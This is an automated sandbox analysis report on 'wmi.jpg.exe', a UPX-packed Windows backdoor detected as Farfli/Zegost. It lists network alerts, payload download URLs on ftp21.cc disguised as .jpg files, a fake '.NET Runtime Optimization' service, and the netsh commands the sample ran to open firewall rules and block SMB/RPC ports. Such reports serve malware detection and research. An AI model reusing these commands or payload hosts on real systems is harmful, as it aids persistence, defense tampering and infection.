Summary | ZeroBOX

wmi.jpg.exe

PE32 PE File
Category: FILE
Machine: s1_win7_x6401
Started: July 1, 2024, 9:18 a.m.
Completed: July 1, 2024, 9:20 a.m.
Size: 45.5KB
Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5: 3d3aedfaeaf39544ff74fe6fe4541fc2
SHA256: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71
CRC32: 9CAA3147
ssdeep: 768:XQ7R4nqTvoV22QbyMhOk9w+wRGtVEhq8C5eIdp5b4Fk0v5za:w4nVV22Q+mO0wrwVEUdpaFjv5G
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Suricata Alerts

Flow | SID | Signature | Category
TCP 31.184.207.62:80 -> 192.168.56.101:49174 | 2014819 | ET INFO Packed Executable Download | Misc activity
UDP 192.168.56.101:54148 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
TCP 31.184.207.62:80 -> 192.168.56.101:49174 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 31.184.207.62:80 -> 192.168.56.101:49174 | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | A Network Trojan was detected
TCP 31.184.207.62:80 -> 192.168.56.101:49174 | 2023672 | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 | A Network Trojan was detected
UDP 192.168.56.101:53004 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
TCP 211.108.60.155:80 -> 192.168.56.101:49176 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.101:49176 | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.101:49176 | 2023672 | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 | A Network Trojan was detected
TCP 192.168.56.101:49286 -> 192.168.0.109:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity
TCP 211.108.60.155:80 -> 192.168.56.101:49796 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.101:49796 | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.101:49796 | 2023672 | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 | A Network Trojan was detected
UDP 192.168.56.101:53850 -> 8.8.8.8:53 | 2012171 | ET INFO DYNAMIC_DNS Query to 3322.org Domain | Misc activity
TCP 211.108.60.155:80 -> 192.168.56.101:49998 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 192.168.56.101:51677 -> 192.168.0.56:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity
TCP 192.168.56.101:52794 -> 51.161.196.188:443 | 2038968 | ET INFO SSH-2.0-Go version string Observed in Network Traffic | Misc activity
UDP 192.168.56.101:58166 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
TCP 192.168.56.101:55755 -> 192.168.0.101:135 | 2001581 | ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection | Misc activity
UDP 192.168.56.101:57986 -> 164.124.101.2:53 | 2034196 | ET INFO External IP Lookup Domain DNS Lookup (my-ip .io) | Potentially Bad Traffic
TCP 192.168.56.101:58804 -> 192.168.14.249:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity
TCP 192.168.56.101:64311 -> 192.168.13.197:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.101:49935 -> 104.78.73.222:443 | C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com | 2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63
TLS 1.2 192.168.56.101:50023 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:51486 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:53840 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:54343 -> 193.228.196.69:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 75:ce:fc:4e:72:d9:c8:06:65:40:3b:ca:5a:f6:97:bf:df:c3:e8:ae

Time & API | Arguments | Status | Return | Repeated
WriteConsoleA | buffer: "Ok."; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "Ok."; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "ERR IPsec[05019] :"; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "Policy with name 'Block' does not exist"; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "ERR IPsec[05019] :"; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "Policy with name 'Block' does not exist"; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "Creating new Policy with name 'Block'..."; console_handle: 0x00000007 | 1 | 1 | 0
WriteConsoleA | buffer: "New Policy is created and updated successfully"; console_handle: 0x00000007 | 1 | 1 | 0

Time & API | Arguments | Status | Return | Repeated
GlobalMemoryStatusEx | (no arguments) | 1 | 1 | 0

suspicious_features: Connection to IP address | suspicious_request: GET http://118.184.169.48/dyndns/getip
suspicious_features: Connection to IP address | suspicious_request: GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
suspicious_features: GET method with no useragent header, Connection to IP address | suspicious_request: GET http://43.198.152.240:8080/api/node/ip_validate
domain: members.3322.org
request: GET http://ssl.ftp21.cc/445.jpg
request: GET http://hook.ftp21.cc/MpMgSvc.dll
request: GET http://hook.ftp21.cc/MpMgSvc.jpg
request: GET http://118.184.169.48/dyndns/getip
request: GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
request: GET http://hook.ftp21.cc/Hooks.jpg
request: GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe
request: GET http://hook.ftp21.cc/64.jpg
request: GET http://down.ftp21.cc/Update.txt
request: GET http://43.198.152.240:8080/api/node/ip_validate
domain: ssl.ftp21.cc | description: Cocos Islands domain TLD
domain: down.ftp21.cc | description: Cocos Islands domain TLD
domain: hook.ftp21.cc | description: Cocos Islands domain TLD
name: RT_VERSION | language: LANG_CHINESE | filetype: data | sublanguage: SUBLANG_CHINESE_SIMPLIFIED | offset: 0x0001f05c | size: 0x000003fc
file: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Time & API | Arguments | Status | Return | Repeated
CreateServiceA | service_start_name: ; start_type: 2; password: ; display_name: .NET Runtime Optimization Service v3.0.30317_X86; filepath: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe; service_name: clr_optimization_v3.0.30317_32; filepath_r: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe; desired_access: 983551; service_handle: 0x002e1ff8; error_control: 1; service_type: 16; service_manager_handle: 0x002e1d50 | 1 | 3022840 | 0

Time & API | Arguments | Status | Return | Repeated
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add policy name=Block; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add filterlist name=Filter1; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add filteraction name=FilteraAtion1 action=block; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1; filepath: netsh.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: netsh.exe; parameters: ipsec static set policy name=Block assign=y; filepath: netsh.exe | 1 | 1 | 0

Time & API | Arguments | Status | Return | Repeated
NtProtectVirtualMemory | process_identifier: 2564; stack_dep_bypass: 0; stack_pivoted: 0; heap_dep_bypass: 1; length: 69632; protection: 32 (PAGE_EXECUTE_READ); base_address: 0x10001000; process_handle: 0xffffffff | 1 | 0 | 0

section: UPX1 (size_of_data 0x0000ac00, virtual_address 0x00014000, virtual_size 0x0000b000, entropy 7.924912120479621) | description: A section with a high entropy has been found
entropy: 0.966292134831 | description: Overall entropy of this PE file is high
section: UPX0 | description: Section name indicates UPX
section: UPX1 | description: Section name indicates UPX
cmdline: netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline: netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline: netsh.exe ipsec static add policy name=Block
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline: netsh.exe ipsec static add filterlist name=Filter1
cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline: netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline: netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block
cmdline: netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline: netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
cmdline: netsh.exe ipsec static set policy name=Block assign=y
cmdline: "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline: netsh.exe ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
host: 43.198.152.240
host: 51.161.196.188
service_name: clr_optimization_v3.0.30317_32 | service_path: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Vendor | Detection
Bkav | W32.AIDetectMalware
Lionic | Trojan.Win32.Farfli.4!c
Elastic | malicious (moderate confidence)
MicroWorld-eScan | Gen:Heur.Mint.Zard.30
CAT-QuickHeal | Trojan.Aksula.A
Skyhigh | BehavesLike.Win32.Generic.pc
McAfee | Artemis!3D3AEDFAEAF3
Cylance | Unsafe
VIPRE | Gen:Heur.Mint.Zard.30
Sangfor | Suspicious.Win32.Save.a
K7AntiVirus | Trojan ( 0040f7ad1 )
BitDefender | Gen:Heur.Mint.Zard.30
K7GW | Trojan ( 0040f7ad1 )
Cybereason | malicious.aeaf39
Arcabit | Trojan.Mint.Zard.30
Baidu | Win32.Trojan.Farfli.bg
Symantec | ML.Attribute.HighConfidence
ESET-NOD32 | a variant of Win32/Farfli.JU
APEX | Malicious
Avast | Win32:Evo-gen [Trj]
Cynet | Malicious (score: 100)
Kaspersky | UDS:Trojan.Win32.Generic
Alibaba | Backdoor:Win32/Zegost.24e518cf
Rising | Backdoor.Farfli!1.B6C5 (CLOUD)
Emsisoft | Gen:Heur.Mint.Zard.30 (B)
F-Secure | Trojan.TR/Crypt.FKM.Gen
DrWeb | Trojan.Siggen28.63414
Zillya | Trojan.Farfli.Win32.91278
TrendMicro | TROJ_GEN.R002C0DFL24
McAfeeD | Real Protect-LS!3D3AEDFAEAF3
Trapmine | malicious.moderate.ml.score
FireEye | Generic.mg.3d3aedfaeaf39544
Sophos | Mal/Behav-160
Ikarus | Backdoor.Win32.Zegost
Jiangmin | Trojan.Generic.hoagb
Google | Detected
Avira | TR/Crypt.FKM.Gen
Antiy-AVL | Trojan/Win32.Farfli
Kingsoft | malware.kb.b.888
Gridinsoft | Trojan.Win32.Agent.sa
Xcitium | Backdoor.Win32.Zegost.c@4m3x9i
Microsoft | Backdoor:Win32/Zegost!pz
ZoneAlarm | UDS:DangerousObject.Multi.Generic
GData | Gen:Heur.Mint.Zard.30
Varist | W32/KillAV.AU.gen!Eldorado
AhnLab-V3 | Backdoor/Win.NG.R582744
BitDefenderTheta | AI:Packer.BC223D901F
DeepInstinct | MALICIOUS
VBA32 | BScope.TrojanDDoS.Macri
Malwarebytes | Trojan.Farfli.UPX